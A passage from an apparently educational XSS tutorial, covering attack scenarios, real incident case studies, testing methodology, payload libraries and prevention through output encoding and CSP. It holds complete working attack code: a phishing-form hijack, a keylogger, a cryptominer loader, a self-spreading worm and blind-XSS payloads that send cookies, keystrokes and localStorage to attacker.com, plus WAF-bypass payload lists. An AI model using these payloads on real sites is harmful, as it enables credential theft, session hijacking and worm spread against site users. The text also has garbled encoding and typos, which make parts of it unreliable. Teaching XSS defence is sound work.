</div>
</div>
`;
// ๐ฃ Intercept form submission
document.getElementById('phishForm').onsubmit = function(e) {
e.preventDefault();
var username = this.username.value;
var password = this.password.value;
// ๐ค Send credentials to attacker
fetch('https://attacker.com/phish', {
method: 'POST',
body: JSON.stringify({
site: window.location.hostname,
username: username,
password: password,
timestamp: new Date().toISOString()
})
}).then(() => {
// ๐ Redirect to real login page after stealing
window.location.href = '/login?session_expired=true';
});
};
</script>
๐ฏ WHY IT WORKS:
โ
Same domain (looks legitimate)
โ
Branded logo (builds trust)
โ
Professional design
โ
"Session expired" message (urgency)
โ
No visible signs of phishing
๐ SUCCESS RATE: ~40-60% of users enter credentialsScenario 3: Keylogger
<script>
// ๐ฏ Install invisible keylogger
var keys = [];
document.addEventListener('keypress', function(e) {
keys.push({
key: e.key,
time: new Date().toISOString(),
target: e.target.tagName
});
// ๐ค Send batch every 10 keys
if (keys.length >= 10) {
fetch('https://attacker.com/keys', {
method: 'POST',
body: JSON.stringify(keys)
});
keys = [];
}
});
// ๐ฃ Capture form submissions (passwords, credit cards)
document.addEventListener('submit', function(e) {
var formData = new FormData(e.target);
var data = {};
for(var pair of formData.entries()) {
data[pair[0]] = pair[1];
}
fetch('https://attacker.com/forms', {
method: 'POST',
body: JSON.stringify(data)
});
});
</script>
๐ฏ CAPTURES:
โข Every keystroke
โข Passwords
โข Credit card numbers
โข Personal messages
โข Sensitive data entryScenario 4: Cryptocurrency Miner
<script src="https://attacker.com/coinhive.min.js"></script>
<script>
// โ๏ธ Use victim's CPU to mine cryptocurrency
var miner = new CoinHive.Anonymous('attacker-wallet-id', {
threads: 4,
autoThreads: false,
throttle: 0.2
});
miner.start();
// ๐คซ Run silently in background
</script>
โ ๏ธ IMPACT:
โข High CPU usage (100%)
โข Computer slows down
โข Increased electricity costs
โข Battery drain (mobile)
๐ฐ Attacker profits from victim's resourcesScenario 5: Self-Propagating Worm
<script>
// ๐ฆ XSS Worm that spreads itself
(function() {
// The worm's code (this script)
var wormCode = document.currentScript.outerHTML;
// ๐ Find all comment/post forms
var forms = document.querySelectorAll('form');
forms.forEach(function(form) {
// โณ Wait for user to post anything
form.addEventListener('submit', function(e) {
// ๐ Inject worm into their post
var textAreas = form.querySelectorAll('textarea');
textAreas.forEach(function(textarea) {
textarea.value += wormCode;
});
});
});
// ๐ค Also post immediately as new comment
fetch('/api/comment', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
text: 'Interesting article! ' + wormCode
})
});
})();
</script>
๐ RESULT:
1๏ธโฃ Victim A views infected comment
2๏ธโฃ Worm executes and posts itself as new comment
3๏ธโฃ Victim B views worm's comment
4๏ธโฃ Worm executes and posts itself again
5๏ธโฃ Exponential spread across entire platform
6๏ธโฃ Within hours: thousands of users infected
๐ FAMOUS EXAMPLE: Samy Worm (MySpace 2005)
- Spread to 1 million profiles in 20 hours๐ Impact by Application Type
๐ฆ BANKING/FINANCIAL:
โโโ Account takeover
โโโ Money transfer
โโโ Stealing credentials
โโโ Viewing account details
โโโ ๐ด CRITICAL IMPACT
๐ E-COMMERCE:
โโโ Order manipulation
โโโ Credit card theft
โโโ Address changes
โโโ Fraudulent purchases
โโโ ๐ด HIGH IMPACT
๐ฅ HEALTHCARE:
โโโ Medical record access
โโโ HIPAA violations
โโโ Patient data theft
โโโ Prescription manipulation
โโโ ๐ด CRITICAL IMPACT
๐ฑ SOCIAL MEDIA:
โโโ Profile takeover
โโโ Post malicious content
โโโ Spread worms
โโโ Steal personal data
โโโ ๐ MEDIUM-HIGH IMPACT
๐ข ENTERPRISE/CORPORATE:
โโโ Internal data theft
โโโ Intellectual property
โโโ Corporate espionage
โโโ Network infiltration
โโโ ๐ด CRITICAL IMPACT๐ Famous Real-World XSS Attacks
๐ฏ CASE STUDY 1: Samy Worm (MySpace, 2005)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฑ Platform: MySpace
๐ค Attacker: Samy Kamkar
๐ฏ Type: Stored XSS Worm
๐ฅ WHAT HAPPENED:
โข Exploited MySpace profile page XSS
โข Payload added "Samy is my hero" to profiles
โข Added Samy as friend automatically
โข Copied itself to infected profiles
๐
TIMELINE:
โข Started: October 4, 2005, 12:00 AM
โข Hour 1: 221 friends
โข Hour 6: Several thousand
โข Hour 20: 1,000,000+ profiles infected
โข Result: MySpace shut down for hours
โ๏ธ LEGAL OUTCOME:
โข Samy arrested and charged
โข Convicted of computer hacking
โข 3 years probation
โข Banned from using computers
๐ LESSON: XSS can spread exponentially
๐ฏ CASE STUDY 2: TweetDeck XSS (Twitter, 2014)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฆ Platform: TweetDeck (Twitter client)
๐ฏ Type: Stored XSS Worm
๐ฅ WHAT HAPPENED:
โข XSS in tweet rendering
โข Payload in tweet content
โข Self-replicating through retweets
โข Affected TweetDeck users globally
โก IMPACT:
โข Thousands of accounts infected
โข Automatic retweeting of payload
โข Pop-ups and unwanted alerts
โข Twitter forced to take TweetDeck offline
๐ง FIX:
โข Emergency patch deployed
โข Improved input sanitization
โข Enhanced XSS protection
๐ฏ CASE STUDY 3: eBay Stored XSS (2015-2016)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Platform: eBay
๐ฏ Type: Stored XSS
โฐ Duration: Existed for months
๐ฅ WHAT HAPPENED:
โข XSS in product listings
โข Attackers created malicious listings
โข Fake login forms on eBay domain
โข Credential theft at scale
โก IMPACT:
โข Unknown number of compromised accounts
โข Stolen credentials sold on dark web
โข Reputational damage to eBay
โข Multiple security researchers reported it
๐ LESSON: Even major platforms can have XSS
๐ฏ CASE STUDY 4: British Airways XSS (2018)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ๏ธ Platform: British Airways website
๐ฏ Type: Supply Chain XSS Attack
๐ฅ WHAT HAPPENED:
โข Attackers compromised third-party script
โข Injected payment card skimmer
โข Ran on BA's website for 15 days
โข Stole customer payment data
โก IMPACT:
โข 380,000 payment cards compromised
โข ยฃ20 million GDPR fine
โข Massive reputation damage
โข Class action lawsuits
๐ LESSON: Third-party scripts are attack vectors
๐ฏ CASE STUDY 5: Fortnite XSS (2019)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฎ Platform: Epic Games (Fortnite)
๐ฏ Type: Reflected XSS
๐ฌ Researchers: Check Point
๐ฅ WHAT HAPPENED:
โข XSS in login flow
โข Could steal account tokens
โข Access to payment methods
โข V-Bucks (virtual currency) theft
โ ๏ธ POTENTIAL IMPACT:
โข 200+ million player accounts at risk
โข Account takeovers
โข Financial theft
โข Epic patched quickly after disclosure
๐ LESSON: Gaming platforms are valuable targets๐ 7. FINDING XSS VULNERABILITIES
๐ Complete Testing Methodology
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS VULNERABILITY TESTING WORKFLOW โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ PHASE 1: RECONNAISSANCE
โโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐บ๏ธ Map the application
โโโ ๐ Identify all input points
โโโ ๐ Document data flow
โโโ ๐ฌ Analyze JavaScript code
โโโ ๐ Review security headers
๐ฏ PHASE 2: INITIAL PROBING
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐งช Test with benign payloads
โโโ ๐๏ธ Observe reflection patterns
โโโ ๐ Identify encoding/filtering
โโโ ๐บ๏ธ Map input validation
โโโ ๐ Document vulnerable parameters
๐ฏ PHASE 3: EXPLOITATION
โโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ ๏ธ Craft context-specific payloads
โโโ ๐ง Bypass filters/WAF
โโโ ๐ Test different browsers
โโโ โ
Verify JavaScript execution
โโโ ๐ Confirm exploitability
๐ฏ PHASE 4: IMPACT ASSESSMENT
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ฏ Determine attack surface
โโโ ๐ Evaluate data sensitivity
โโโ โฌ๏ธ Test privilege escalation
โโโ ๐ Document full impact
โโโ โ ๏ธ Assign severity rating
๐ฏ PHASE 5: REPORTING
โโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ Create proof-of-concept
โโโ ๐ Document reproduction steps
โโโ ๐ง Provide remediation advice
โโโ ๐ Rate CVSS score
โโโ ๐ค Submit responsible disclosure๐ Input Point Discovery
๐ฏ ALL POSSIBLE XSS ENTRY POINTS:
1๏ธโฃ ๐ FORM FIELDS:
โโโ Text inputs
โโโ Textareas
โโโ Hidden fields
โโโ Search boxes
โโโ File upload fields
2๏ธโฃ ๐ URL PARAMETERS:
โโโ Query strings (?param=value)
โโโ Path parameters (/user/123)
โโโ Fragment identifiers (#section)
โโโ Redirect parameters
3๏ธโฃ ๐จ HTTP HEADERS:
โโโ User-Agent
โโโ Referer
โโโ Cookie
โโโ X-Forwarded-For
โโโ Custom headers
4๏ธโฃ ๐ FILE OPERATIONS:
โโโ Filename
โโโ File content
โโโ Metadata (EXIF)
โโโ File type
5๏ธโฃ ๐ API ENDPOINTS:
โโโ REST APIs
โโโ GraphQL
โโโ WebSocket messages
โโโ JSON/XML responses
6๏ธโฃ ๐ช STORAGE:
โโโ Cookies
โโโ localStorage
โโโ sessionStorage
โโโ IndexedDB
7๏ธโฃ ๐ก THIRD-PARTY INTEGRATIONS:
โโโ OAuth callbacks
โโโ SAML responses
โโโ Widgets
โโโ Embedded content๐งช Basic Test Payloads
๐ฏ PHASE 1: SIMPLE DETECTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
๐ฏ PHASE 2: EVENT HANDLERS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
๐ฏR PASE 3: JAVASCRIPT PROTOCOLS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<a href="javascript:alert(1)">Click</a>
<iframe src="javascript:alert(1)">
<form action="javascript:alert(1)">
๐ฏR PHASE 4: DATA PROTOOLS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<object data="data:text/html,<script>alert(1)</script>">
<embed src="data:text/html,<script>alert(1)</script>">
<iframe src="data:text/html,<script>alert(1)</script>">
๐ฏR PHASE 5: DOM-BASD TESTS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
#<img src=x onerror=alert(1)>
?search=<script>alert(1)</script>
javascript:alert(1)๐ฌ Advanced Testing Techniques
Testing Methodology for Different Contexts:
// 1๏ธโฃ HTML Context Test
// Input gets reflected in HTML body
Test Input: <script>alert('HTML')</script>
Expected Result: Script executes
// 2๏ธโฃ Attribute Context Test
// Input reflected inside HTML attribute
Test Input: " onfocus=alert('ATTR') autofocus="
Expected Result: Breaks out of attribute, executes
// 3๏ธโฃ JavaScript Context Test
// Input inside <script> tags or JS code
Test Input: '; alert('JS'); //
Expected Result: Closes string, executes, comments rest
// 4๏ธโฃ URL Context Test
// Input used in href/src attributes
Test Input: javascript:alert('URL')
Expected Result: JavaScript protocol executes
// 5๏ธโฃ CSS Context Test
// Input in style attributes or tags
Test Input: </style><script>alert('CSS')</script>
Expected Result: Breaks out of CSS context๐ ๏ธ Automated Scanning Tools
๐ง SPECIALIZED XSS SCANNERS:
โโโ XSStrike (Python)
โโโ Dalfox (Go)
โโโ XSSer
โโโ XSScrapy
โโโ Breach XSS Scanner
๐ท๏ธ WEB APPLICATION SCANNERS:
โโโ Burp Suite Pro
โโโ OWASP ZAP
โโโ Acunetix
โโโ Netsparker
โโโ Qualys
๐ BROWSER EXTENSIONS:
โโโ XSS Validator (Chrome)
โโโ Wappalyzer (Tech detection)
โโโ Hack-Tools
โโโ Cookie Editor
โก MANUAL TESTING TOOLS:
โโโ Burp Suite (Intruder/Repeater)
โโโ Browser DevTools
โโโ Postman/Insomnia
โโโ cURL
โโโ DOM Invader๐ Testing Checklist
โ Test ALL input fields
โ Test URL parameters
โ Test HTTP headers
โ Test file uploads
โ Test API endpoints
โ Review JavaScript code
โ Check for DOM XSS
โ Test with multiple browsers
โ Check security headers
โ Test filter bypasses
โ Document all findings
โ Create PoC exploits
โ Assess impact/severity
โ Prepare report๐ฌ 8. TESTING METHODOLOGY
๐งช COMPREHENSIVE XSS TESTING FRAMEWORK
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS TESTING METHODOLOGY โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ PHASE 1: INFORMATION GATHERING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐บ๏ธ Application Mapping
โ โโโ Identify all endpoints
โ โโโ Map input parameters
โ โโโ Document JavaScript usage
โ โโโ Analyze third-party dependencies
โ
โโโ ๐ Technology Stack Analysis
โ โโโ Identify frameworks
โ โโโ Detect WAF presence
โ โโโ Analyze security headers
โ โโโ Check for CSP
โ
โโโ ๐ Test Environment Setup
โโโ Configure proxy (Burp/ZAP)
โโโ Set up browser extensions
โโโ Prepare test payloads
โโโ Establish monitoring
๐ฏ PHASE 2: STATIC ANALYSIS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ Source Code Review
โ โโโ Find dangerous sinks
โ โโโ Identify input sources
โ โโโ Check encoding practices
โ โโโ Review third-party code
โ
โโโ ๐๏ธ JavaScript Analysis
โ โโโ DOM XSS sources/sinks
โ โโโ jQuery/JS framework usage
โ โโโ Event handlers
โ โโโ Dynamic code evaluation
โ
โโโ ๐ Configuration Review
โโโ Security headers
โโโ CSP policies
โโโ WAF configurations
โโโ Logging settings
๐ฏ PHASE 3: DYNAMIC TESTING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ Manual Testing
โ โโโ Test all input fields
โ โโโ Check URL parameters
โ โโโ Test HTTP headers
โ โโโ File upload testing
โ
โโโ ๐ค Automated Scanning
โ โโโ Run vulnerability scanners
โ โโโ Fuzz with payloads
โ โโโ Test filter bypasses
โ โโโ Check encoding issues
โ
โโโ ๐ฏ Context-Specific Testing
โโโ HTML context testing
โโโ Attribute context testing
โโโ JavaScript context testing
โโโ URL context testing
โโโ CSS context testing
๐ฏ PHASE 4: ADVANCED TESTING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ ๐ง WAF Bypass Testing
โ โโโ Test encoding variations
โ โโโ Try polyglot payloads
โ โโโ Test with different HTTP methods
โ โโโ Check case sensitivity
โ
โโโ ๐ Blind XSS Testing
โ โโโ Deploy callback servers
โ โโโ Test admin interfaces
โ โโโ Check log viewers
โ โโโ Monitor for callbacks
โ
โโโ ๐๏ธ DOM XSS Testing
โโโ Test fragment identifiers
โโโ Check localStorage/sessionStorage
โโโ Test postMessage
โโโ Analyze dynamic code execution
๐ฏ PHASE 5: VALIDATION & REPORTING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โ
Proof-of-Concept Creation
โ โโโ Create working exploits
โ โโโ Document attack vectors
โ โโโ Record exploitation steps
โ โโโ Capture evidence
โ
โโโ ๐ Impact Assessment
โ โโโ Evaluate data exposure
โ โโโ Assess privilege escalation
โ โโโ Check worm potential
โ โโโ Determine business impact
โ
โโโ ๐ Report Generation
โโโ Executive summary
โโโ Technical details
โโโ Reproduction steps
โโโ Remediation advice
โโโ CVSS scoring๐ฏ TESTING CHECKLIST
โ
GENERAL TESTING:
โ Test all URL parameters
โ Test all form fields
โ Test HTTP headers (User-Agent, Referer, Cookie)
โ Test file uploads (filename, metadata)
โ Test API endpoints
โ Test WebSocket messages
โ Test local/session storage
โ Test postMessage usage
โ
CONTEXT-SPECIFIC TESTING:
โ HTML context: <script>alert(1)</script>
โ Attribute context: " onmouseover="alert(1)
โ JavaScript context: ';alert(1);//
โ URL context: javascript:alert(1)
โ CSS context: </style><script>alert(1)</script>
โ
FILTER BYPASS TESTING:
โ Case variation: <ScRiPt>alert(1)</ScRiPt>
โ Encoding: %3Cscript%3Ealert(1)%3C/script%3E
โ Double encoding: %253Cscript%253Ealert(1)%253C/script%253E
โ HTML entities: <script>alert(1)</script>
โ Whitespace: <img/src=x/onerror=alert(1)>
โ Comments: <scr<!--comment-->ipt>alert(1)</script>
โ
DOM XSS TESTING:
โ location.hash manipulation
โ document.write() usage
โ innerHTML/outerHTML usage
โ eval()/setTimeout() with user input
โ jQuery insecure usage
โ AngularJS injection
โ
BLIND XSS TESTING:
โ Contact forms
โ Support tickets
โ User profiles
โ Comment systems
โ File uploads
โ HTTP headers
โ
SECURITY CONTROLS TESTING:
โ CSP bypass attempts
โ WAF evasion techniques
โ Input validation bypass
โ Output encoding bypass
โ Framework-specific bypasses๐งช TEST PAYLOADS LIBRARY
Basic Detection Payloads:
<!-- ๐ฏ Simple Alert -->
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<!-- ๐ฏR Imag with Error Handler -->
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.domain)>
<!-- ๐ฏR SVG Payload -->
<svg onload=alert()>
<svg><script>alert(1)</script></svg>
<!-- ๐ฏR Iframe -->
<irame src="javascript:alert(1)">
<!-- ๐ฏR Body Evnt -->
<body onload=alert(1)>Attribute Context Payloads:
<!-- ๐ฏ Break out of attribute -->
" onmouseover="alert(1)
" onfocus="alert(1)" autofocus="
' onmouseover='alert(1)
' onfocus='alert(1)' autofocus='
<!-- ๐ฏ Without quotes -->
onmouseover=alert(1)
onfocus=alert(1) autofocus
<!-- ๐ฏ JavaScript protocol -->
javascript:alert(1)
JaVaScRiPt:alert(1)
java	script:alert(1)JavaScript Context Payloads:
// ๐ฏ String termination
';alert(1);//
';alert(1);'
\';alert(1);//
// ๐ฏ Template literals
${alert(1)}
`${alert(1)}`
// ๐ฏ Function termination
);alert(1);//
));alert(1);//
// ๐ฏ Object termination
};alert(1);//
}};alert(1);//
// ๐ฏ Array termination
];alert(1);//
[1,2,3];alert(1);//DOM-Based Payloads:
// ๐ฏ Location manipulation
javascript:alert(1)
#<img src=x onerror=alert(1)>
// ๐ฏ Eval-based
eval('alert(1)')
setTimeout('alert(1)',0)
setInterval('alert(1)',1000)
Function('alert(1)')()
// ๐ฏ DOM manipulation
document.write('<script>alert(1)</script>')
element.innerHTML = '<img src=x onerror=alert(1)>'
element.outerHTML = '<img src=x onerror=alert(1)>'WAF Bypass Payloads:
<!-- ๐ฏ Case manipulation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>
<!-- ๐ฏR Ecoding -->
%3Cscript%3Ealert(1)%3C/script%3E
<script>alert(1)</script>
\u003cscript\u003ealert(1)\u003c/script\u003e
<!-- ๐ฏR Whitspace tricks -->
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<!-- ๐ฏR Tag nesting -->
<scr<script>ipt>alert(1)</script>
<!-- ๐ฏR Plyglot payload -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eBlind XSS Payloads:
<!-- ๐ฏ Basic callback -->
<script>fetch('https://attacker.com/?c='+document.cookie)</script>
<!-- ๐ฏR Imag beacon -->
<script>new Image().src='https://attacker.com/?c='+document.cookie</script>
<!-- ๐ฏR Comprehnsive data theft -->
<script>
var data = {
url: location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
userAgent: navigator.userAgent
};
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify(data)
});
</script>๐ ๏ธ TESTING TOOLS SETUP
Burp Suite Configuration:
๐ฏ BURP SUITE SETUP FOR XSS TESTING:
1๏ธโฃ PROXY CONFIGURATION:
โโโ Set up interception proxy
โโโ Install CA certificate
โโโ Configure scope
โโโ Enable logging
2๏ธโฃ INTRUDER PAYLOADS:
โโโ Load XSS payload wordlists
โโโ Configure attack types
โโโ Set payload processing rules
โโโ Enable grep matching
3๏ธโฃ EXTENSIONS:
โโโ DOM Invader (for DOM XSS)
โโโ Active Scan++
โโโ Autorize
โโโ Logger++
4๏ธโฃ SCANNER CONFIGURATION:
โโโ Enable active scanning
โโโ Configure audit checks
โโโ Set insertion points
โโโ Enable JavaScript analysisBrowser Extensions:
๐ CHROME EXTENSIONS FOR XSS TESTING:
1๏ธโฃ ๐ ๏ธ DEVELOPMENT TOOLS:
โโโ Chrome DevTools (built-in)
โโโ DOM Breakpoints
โโโ JavaScript Debugger
โโโ Network Inspector
2๏ธโฃ ๐ SECURITY EXTENSIONS:
โโโ XSS Validator
โโโ Hack-Tools
โโโ Wappalyzer (tech detection)
โโโ Cookie Editor
โโโ EditThisCookie
3๏ธโฃ ๐ฏ TESTING EXTENSIONS:
โโโ XSS Rays
โโโ XSS Helper
โโโ Max Keyboard (for testing)
โโโ User-Agent SwitcherCommand Line Tools:
# ๐ฏ XSStrike - Advanced XSS Scanner
python3 xsstrike.py -u "https://example.com/search?q=test"
# ๐ฏ Dalfox - Fast XSS Scanner
dalfox url https://example.com/search?q=test
dalfox file urls.txt
# ๐ฏ XSSer
xsser -u "https://example.com" -g "search?q=XSS"
# ๐ฏ Nuclei XSS Templates
nuclei -u https://example.com -t xss.yaml
# ๐ฏ FFUF for Fuzzing
ffuf -w xss-payloads.txt -u "https://example.com/search?q=FUZZ"Wordlists for Testing:
# ๐ Recommended XSS Wordlists
โโโ SecLists/XSS/
โ โโโ XSS_BruteLogic.txt
โ โโโ XSS_Fuzzing.txt
โ โโโ XSS_Polyglot.txt
โ โโโ XSS_Quick.txt
โโโ fuzzdb/xss/
โโโ payloadbox/xss-payload-list
โโโ bo0om/xss.txt๐ TESTING REPORT TEMPLATE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS VULNERABILITY REPORT โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ EXECUTIVE SUMMARY
โโโโโโโโโโโโโโโโโโโโ
โข Vulnerability: Cross-Site Scripting (XSS)
โข Severity: Critical (CVSS: 8.2)
โข Affected Component: User Comment System
โข Impact: Account takeover, data theft
โข Recommendation: Immediate remediation
๐ TECHNICAL DETAILS
โโโโโโโโโโโโโโโโโโโโ
โข Vulnerability Type: Stored XSS
โข Attack Vector: User comments field
โข Affected Parameter: comment_text
โข Request Method: POST
โข Endpoint: /api/comments
โข Payload: <script>alert(document.cookie)</script>
๐ฏ REPRODUCTION STEPS
โโโโโโโโโโโโโโโโโโโโโ
1. Navigate to https://example.com/post/123
2. Submit comment with payload:
<script>fetch('https://attacker.com/?c='+document.cookie)</script>
3. View comment as another user
4. Observe cookie theft in attacker logs
๐ IMPACT ANALYSIS
โโโโโโโโโโโโโโโโโโ
โข Data Exposure: Session cookies, user data
โข Privilege Escalation: Yes
โข Worm Potential: High
โข Affected Users: All users viewing comments
โข Business Impact: Account compromise, reputation damage
๐ก๏ธ REMEDIATION RECOMMENDATIONS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. Input Validation:
โข Implement strict whitelist validation
โข Reject HTML tags in comments field
2. Output Encoding:
โข Use context-aware encoding
โข Encode before rendering:
htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
3. Content Security Policy:
โข Implement strict CSP
โข Use nonces for inline scripts
4. Framework Security:
โข Use built-in escaping features
โข Avoid dangerous functions
๐ REFERENCES
โโโโโโโโโโโโโ
โข OWASP XSS Prevention Cheat Sheet
โข PortSwigger XSS Academy
โข MDN Web Security Guidelines
โข Framework Security Documentation
๐ EVIDENCE
โโโโโโโโโโโ
โข Screenshots: [attached]
โข Proof-of-Concept: [attached]
โข Network Logs: [attached]
โข Video Demonstration: [attached]๐ก๏ธ 9. PREVENTION & MITIGATION
1๏ธโฃ ๐ค OUTPUT ENCODING
๐ฏ GOLDEN RULE:
"Never trust user input. Always encode output!"
๐ ENCODING BY CONTEXT:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Context โ Encoding Method โ
โโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ HTML Body โ HTML Entity Encoding โ
โ โ & โ & โ
โ โ < โ < โ
โ โ > โ > โ
โ โ " โ " โ
โ โ ' โ ' โ
โโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ HTML Attributes โ HTML Attribute Encoding โ
โ โ & โ & โ
โ โ < โ < โ
โ โ > โ > โ
โ โ " โ " โ
โ โ ' โ ' โ
โโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ JavaScript โ JavaScript Encoding โ
โ โ ' โ \' โ
โ โ " โ \" โ
โ โ \ โ \\ โ
โ โ / โ \/ โ
โ โ < โ \x3c โ
โโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ URL โ URL Encoding โ
โ โ & โ %26 โ
โ โ < โ %3C โ
โ โ > โ %3E โ
โ โ " โ %22 โ
โ โ ' โ %27 โ
โโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ CSS โ CSS Encoding โ
โ โ < โ \3C โ
โ โ > โ \3E โ
โ โ ( โ \28 โ
โ โ ) โ \29 โ
โ โ " โ \22 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโImplementation Examples:
// ๐ก๏ธ JavaScript Encoding Functions
function encodeHTML(text) {
return text.replace(/[&<>"']/g, function(match) {
return {
'&': '&',
'<': '<',
'>': '>',
'"': '"',
"'": '''
}[match];
});
}
function encodeAttribute(text) {
return text.replace(/[&<>"'`]/g, function(match) {
return {
'&': '&',
'<': '<',
'>': '>',
'"': '"',
"'": ''',
'`': '`'
}[match];
});
}
function encodeJS(text) {
return text.replace(/[\\'"<>\/]/g, function(match) {
return {
'\\': '\\\\',
"'": "\\'",
'"': '\\"',
'<': '\\x3c',
'>': '\\x3e',
'/': '\\/'
}[match];
});
}
// ๐ฏR Example Usge
var userInput = '<script>alert("XSS")</script>';
document.getElementById('output').innerHTML = encodeHTML(userInput);
// Output: <script>alert("XSS")</script>
# ๐ก๏ธ Python Encoding Examples
import html
import json
import urllib.parse
def secure_output_rendering(user_input):
# ๐ HTML Context
html_safe = html.escape(user_input)
# Output: <script>alert("XSS")</script>
# ๐ JavaScript Context
js_safe = json.dumps(user_input)
# Output: "<script>alert(\"XSS\")</script>"
# ๐ URL Context
url_safe = urllib.parse.quote(user_input)
# Output: %3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
return {
'html': html_safe,
'js': js_safe,
'url': url_safe
}
<!-- ๐ก๏ธ PHP Encoding Examples -->
<?php
// ๐ HTML Context
$safe_html = htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// Converts: <script>alert("XSS")</script>
// To: <script>alert("XSS")</script>
// ๐ JavaScript Context
$safe_js = json_encode($user_input);
// Converts to: "\u003Cscript\u003Ealert(\"XSS\")\u003C\/script\u003E"
// ๐ URL Context
$safe_url = urlencode($user_input);
// Converts to: %3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
// ๐จ Attribute Context
$safe_attr = htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8', false);
?>
2๏ธโฃ ๐ก๏ธ CONTENT SECURITY POLICY (CSP)
๐ฏ WHAT IS CSP?
A security standard that helps prevent XSS by whitelisting trusted sources of content.
๐ CSP HEADER SYNTAX:
Content-Security-Policy: directive1 value1; directive2 value2;
๐ RECOMMENDED CSP POLICY:
Content-Security-Policy:
default-src 'self';
script-src 'self' https://trusted-cdn.com;
style-src 'self' 'unsafe-inline';
img-src 'self' https://*.example.com;
font-src 'self' https://fonts.googleapis.com;
connect-src 'self' https://api.example.com;
frame-src 'none';
object-src 'none';
base-uri 'self';
form-action 'self';
frame-ancestors 'none';
block-all-mixed-content;
upgrade-insecure-requests;CSP Directives Explained:
๐ SECURITY DIRECTIVES:
โโโ default-src 'self'
โ โโโ Default fallback for all resource types
โ
โโโ script-src 'self' 'nonce-abc123'
โ โโโ Controls JavaScript sources
โ โโโ Use nonces for inline scripts
โ
โโโ style-src 'self' 'unsafe-inline'
โ โโโ Controls CSS sources
โ โโโ 'unsafe-inline' often needed for CSS
โ
โโโ img-src 'self' data: https://*.example.com
โ โโโ Controls image sources
โ
โโโ connect-src 'self' https://api.example.com
โ โโโ Controls fetch/XMLHttpRequest/AJAX calls
โ
โโโ font-src 'self' https://fonts.gstatic.com
โ โโโ Controls font sources
โ
โโโ frame-src 'none'
โ โโโ Blocks iframes (prevents clickjacking)
โ
โโโ object-src 'none'
โ โโโ Blocks Flash/Java applets
โ
โโโ base-uri 'self'
โ โโโ Prevents base tag hijacking
โ
โโโ form-action 'self'
โ โโโ Controls form submission targets
โ
โโโ frame-ancestors 'none'
